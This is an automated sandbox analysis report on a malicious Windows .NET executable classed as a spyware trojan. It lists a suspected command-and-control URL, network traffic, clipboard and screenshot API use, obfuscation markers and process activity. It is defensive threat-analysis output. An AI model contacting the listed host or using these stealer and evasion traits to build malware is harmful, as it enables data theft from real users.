                    Source: file.exeString found in binary or memory: http://www.entrust.net/rpa03
                    Source: file.exe, 00000002.00000002.1879224589.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1878661592.00000000011BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tirepublicerj.shop/
                    Source: file.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tirepublicerj.shop/)
                    Source: file.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tirepublicerj.shop/9
                    Source: file.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tirepublicerj.shop/api
                    Source: file.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tirepublicerj.shop/api8
                    Source: file.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tirepublicerj.shop/ndows
                    Source: file.exe, 00000002.00000002.1878711714.00000000011D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tirepublicerj.shop:443/apiCLSID
                    Source: file.exeString found in binary or memory: https://www.entrust.net/rpa0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49735 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49740 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49742 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49744 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49745 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49746 version: TLS 1.2
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00437A60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_00437A60
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00437A60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_00437A60
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00437C10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_00437C10
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0043D0D02_2_0043D0D0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040E16E2_2_0040E16E
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00408A602_2_00408A60
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004442E02_2_004442E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00421B302_2_00421B30
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00418BA22_2_00418BA2
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00444C202_2_00444C20
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0043CE902_2_0043CE90
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004287502_2_00428750
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004257132_2_00425713
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0042F7162_2_0042F716
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004378502_2_00437850
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0041906A2_2_0041906A
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004260102_2_00426010
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004438E02_2_004438E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004180F02_2_004180F0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004438F92_2_004438F9
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004438FB2_2_004438FB
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004278852_2_00427885
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0041D8B02_2_0041D8B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004069502_2_00406950
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004449502_2_00444950
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0043210B2_2_0043210B
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004039102_2_00403910
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004299172_2_00429917
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004061202_2_00406120
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040B92C2_2_0040B92C
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0042F1C12_2_0042F1C1
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004239EB2_2_004239EB
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004211802_2_00421180
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0041618C2_2_0041618C
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0043099F2_2_0043099F
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0041F9A02_2_0041F9A0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0041D1B02_2_0041D1B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0042E9B02_2_0042E9B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0041BA522_2_0041BA52
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0043025E2_2_0043025E
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0042621B2_2_0042621B
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0042BA202_2_0042BA20
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004172222_2_00417222
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00443A302_2_00443A30
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00443AC02_2_00443AC0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004302CD2_2_004302CD
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040F2D02_2_0040F2D0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040B2802_2_0040B280
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004352B02_2_004352B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00402B402_2_00402B40
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00443B602_2_00443B60
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00409B702_2_00409B70
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004223702_2_00422370
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00429B7B2_2_00429B7B
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0042FB7D2_2_0042FB7D
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00405B002_2_00405B00
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00440B002_2_00440B00
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00428B102_2_00428B10
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00419B302_2_00419B30
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00411BDE2_2_00411BDE
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004123EC2_2_004123EC
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00428C622_2_00428C62
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0043C4602_2_0043C460
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0043B4102_2_0043B410
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00441C262_2_00441C26
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004064C02_2_004064C0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0042F4E12_2_0042F4E1
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004324EE2_2_004324EE
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0041D4A02_2_0041D4A0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00408D102_2_00408D10
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0043E5202_2_0043E520
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00442DCA2_2_00442DCA
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00415DD82_2_00415DD8
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00425DA02_2_00425DA0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004085B02_2_004085B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004476482_2_00447648
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004096602_2_00409660
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00404E202_2_00404E20
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0043C6C02_2_0043C6C0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0043E6E02_2_0043E6E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004186E52_2_004186E5
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004446802_2_00444680
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0041DE902_2_0041DE90
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0043DF602_2_0043DF60
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00429F7C2_2_00429F7C
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004337072_2_00433707
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00402F102_2_00402F10
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00427FC02_2_00427FC0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004437D02_2_004437D0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00433FDF2_2_00433FDF
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004127E02_2_004127E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0042A7F02_2_0042A7F0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00434FF02_2_00434FF0
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0042AF922_2_0042AF92
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 00408280 appears 47 times
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 00414C20 appears 145 times
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6496 -s 160
                    Source: file.exeStatic PE information: invalid certificate
                    Source: file.exe, 00000000.00000000.1771192716.0000000000102000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHandler.exe0 vs file.exe
                    Source: file.exe, 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHandler.exe0 vs file.exe
                    Source: file.exe, 00000000.00000002.1994165417.000000000084E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                    Source: file.exeBinary or memory string: OriginalFilenameHandler.exe0 vs file.exe
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: file.exeStatic PE information: Section: .BSS ZLIB complexity 1.0003366411102483
                    Source: file.exe, vq3eeWeR9wjKffmTlE.csCryptographic APIs: 'CreateDecryptor'
                    Source: file.exe, vq3eeWeR9wjKffmTlE.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.file.exe.34f9550.0.raw.unpack, vq3eeWeR9wjKffmTlE.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.file.exe.34f9550.0.raw.unpack, vq3eeWeR9wjKffmTlE.csCryptographic APIs: 'CreateDecryptor'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/5@1/1
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0043D0D0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_0043D0D0
                    Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6496
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_03
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\5676b671-4a64-45a5-ba8b-7a402d12f1bbJump to behavior
                    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: file.exeReversingLabs: Detection: 39%
                    Source: file.exeVirustotal: Detection: 43%
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6496 -s 160
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: System.Windows.Forms.pdb source: WEREBF6.tmp.dmp.5.dr
                    Source: Binary string: mscorlib.pdb source: WEREBF6.tmp.dmp.5.dr
                    Source: Binary string: System.ni.pdbRSDS source: WEREBF6.tmp.dmp.5.dr
                    Source: Binary string: mscorlib.ni.pdb source: WEREBF6.tmp.dmp.5.dr
                    Source: Binary string: System.pdb) source: WEREBF6.tmp.dmp.5.dr
                    Source: Binary string: Handler.pdb source: file.exe, WEREBF6.tmp.dmp.5.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS source: WEREBF6.tmp.dmp.5.dr
                    Source: Binary string: Handler.pdbt-^q source: WEREBF6.tmp.dmp.5.dr
                    Source: Binary string: System.ni.pdb source: WEREBF6.tmp.dmp.5.dr
                    Source: Binary string: System.pdb source: WEREBF6.tmp.dmp.5.dr

                    Data Obfuscation

                    barindex
                    Source: file.exe, vq3eeWeR9wjKffmTlE.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 0.2.file.exe.34f9550.0.raw.unpack, vq3eeWeR9wjKffmTlE.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: file.exeStatic PE information: 0xB98C4C41 [Thu Aug 23 20:32:01 2068 UTC]
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004499A1 push esp; ret 2_2_004499A2
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0044AAD0 push ecx; retn 0041h2_2_0044AAD5
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00447648 push esi; ret 2_2_00447979
                    Source: file.exe, vCg2VT5p7jXNk50llbq.csHigh entropy of concatenated method names: 'OkE5tnHZaj', 'quL5gsUNKs', 'eLK5c84hpa', 'gXo58eGg5j', 'GW55mMYBwj', 'dbk5nDS4d7', 'YJd5ONDt15', 'tsG5SJZu72', 'FvJ53MSI6H', 'NUD52Skowi'
                    Source: file.exe, vq3eeWeR9wjKffmTlE.csHigh entropy of concatenated method names: 'RmVqL4ujd4', 'nW4lBacjpc', 'IAr5ATjHqU', 'UIx5yCnXZI', 'oQd5WcYeRd', 'qXl50hRD5T', 'oR65zJ81n2', 'jQiB7OERf', 'LicZSc09T', 'a2jGlQURl'
                    Source: 0.2.file.exe.34f9550.0.raw.unpack, vCg2VT5p7jXNk50llbq.csHigh entropy of concatenated method names: 'OkE5tnHZaj', 'quL5gsUNKs', 'eLK5c84hpa', 'gXo58eGg5j', 'GW55mMYBwj', 'dbk5nDS4d7', 'YJd5ONDt15', 'tsG5SJZu72', 'FvJ53MSI6H', 'NUD52Skowi'
                    Source: 0.2.file.exe.34f9550.0.raw.unpack, vq3eeWeR9wjKffmTlE.csHigh entropy of concatenated method names: 'RmVqL4ujd4', 'nW4lBacjpc', 'IAr5ATjHqU', 'UIx5yCnXZI', 'oQd5WcYeRd', 'qXl50hRD5T', 'oR65zJ81n2', 'jQiB7OERf', 'LicZSc09T', 'a2jGlQURl'
                    Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
